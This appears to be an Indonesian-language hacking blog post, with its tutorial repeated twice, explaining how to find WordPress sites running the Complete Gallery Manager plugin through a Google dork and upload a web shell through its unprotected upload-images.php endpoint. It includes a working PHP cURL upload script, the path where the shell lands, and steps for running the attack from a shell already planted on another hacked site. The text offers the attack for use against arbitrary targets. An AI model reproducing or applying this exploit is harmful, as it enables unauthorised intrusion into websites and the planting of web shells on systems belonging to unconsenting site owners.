salam hacking semua :)
langsung saja yah kawan.
bahan-bahan :
[+]Dork : inurl:/wp-content/plugins/complete-gallery-manager/
[+]Exploit: /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
[+]Script PHP :
Script php :
<?php
$uploadfile="shell.php";
$ch = curl_init("http:target/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[+]Akses shell :
http://site/wp-content/uploads/2013/09/namashell.php
Langkah-Langkah :
1.cari target dulu dengan dork tersebut ke google.
2.jika sudah mendapatkan target, beri exploit di belakangnya.
contoh:
http://target.com/
kamu kasih exploit jadi gini :
http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
3.setelah selesai diberi exploit, nanti kita akan mengetahui situs tersebut Vuln , atau tidak .
contoh vuln:
4.setelah mendapatkan Target yg vuln seperti pada gambar, tinggal siapkan script PHP nya,
disini kita harus mempunyai shell yg sudah tertanam dahulu sebagai pengganti XAMPP, lalu kamu buka shell yang sudah tertanam itu, kamu buat file baru (NEWFILE) , lalu taruh script PHP itu kedalam newfile tersebut..
lihat gambar :
KETERANGAN:
shell.php diganti dengan nama shell kamu yang ada di web yg kamu pakai itu.
dan http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
kamu ganti dengan URL TARGET yang sudah kamu beri exploit tadi ..
5.setelah merubah target dan nama shell , lalu klik save , dan kemudian kamu buka file yang kamu save tadi , jika sukses terupload maka akan muncul success upload, dan url tempat shell kamu berada.
6.tinggal menuju shell, dan hajar deh >.<
thanks semoga bermanfaat :)
langsung saja yah kawan.
bahan-bahan :
[+]Dork : inurl:/wp-content/plugins/complete-gallery-manager/
[+]Exploit: /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
[+]Script PHP :
Script php :
<?php
$uploadfile="shell.php";
$ch = curl_init("http:target/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[+]Akses shell :
http://site/wp-content/uploads/2013/09/namashell.php
Langkah-Langkah :
1.cari target dulu dengan dork tersebut ke google.
2.jika sudah mendapatkan target, beri exploit di belakangnya.
contoh:
http://target.com/
kamu kasih exploit jadi gini :
http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
3.setelah selesai diberi exploit, nanti kita akan mengetahui situs tersebut Vuln , atau tidak .
contoh vuln:
4.setelah mendapatkan Target yg vuln seperti pada gambar, tinggal siapkan script PHP nya,
disini kita harus mempunyai shell yg sudah tertanam dahulu sebagai pengganti XAMPP, lalu kamu buka shell yang sudah tertanam itu, kamu buat file baru (NEWFILE) , lalu taruh script PHP itu kedalam newfile tersebut..
lihat gambar :
KETERANGAN:
shell.php diganti dengan nama shell kamu yang ada di web yg kamu pakai itu.
dan http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
kamu ganti dengan URL TARGET yang sudah kamu beri exploit tadi ..
5.setelah merubah target dan nama shell , lalu klik save , dan kemudian kamu buka file yang kamu save tadi , jika sukses terupload maka akan muncul success upload, dan url tempat shell kamu berada.
6.tinggal menuju shell, dan hajar deh >.<
thanks semoga bermanfaat :)
Komentar
Posting Komentar